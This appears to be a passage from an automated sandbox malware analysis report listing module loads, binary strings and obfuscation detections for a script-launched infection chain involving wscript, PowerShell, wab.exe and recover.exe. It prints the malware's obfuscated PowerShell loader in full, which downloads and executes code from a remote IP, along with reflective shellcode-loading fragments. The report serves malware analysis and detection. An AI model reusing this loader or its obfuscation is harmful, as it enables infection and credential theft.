        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: ifsutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: ws\System.Core.pdbAP source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: recover.pdb source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3357478857.000000000019E000.00000002.00000001.01000000.00000007.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3357480390.000000000019E000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR*\ source: powershell.exe, 00000005.00000002.2455567320.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: recover.pdbGCTL source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: stem.Core.pdb/ source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wab.pdbGCTL source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: wab.pdb source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("PowerShell.exe", ""$Caked124 = 1;$Allegroernes15='S';$All", "", "", "0");
        Source: Yara matchFile source: 00000005.00000002.2459777266.0000000009FC7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2449498441.000000000580F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2456067729.0000000008600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Transpatronized)$global:Decentralised = [System.Text.Encoding]::ASCII.GetString($Unlaid)$global:Museumise=$Decentralised.substring(307583,25216)<#Strygeinstrumentet Anelsers Leisured
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Gallantise $Minimumslaengden $Leewill), (Delyst @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tekststumpernes = [AppDomain]::CurrentDomain.GetAssemblies(
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Transponeredes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Tapinocephalic, $false).DefineType($Enmesh
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Transpatronized)$global:Decentralised = [System.Text.Encoding]::ASCII.GetString($Unlaid)$global:Museumise=$Decentralised.substring(307583,25216)<#Strygeinstrumentet Anelsers Leisured
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a 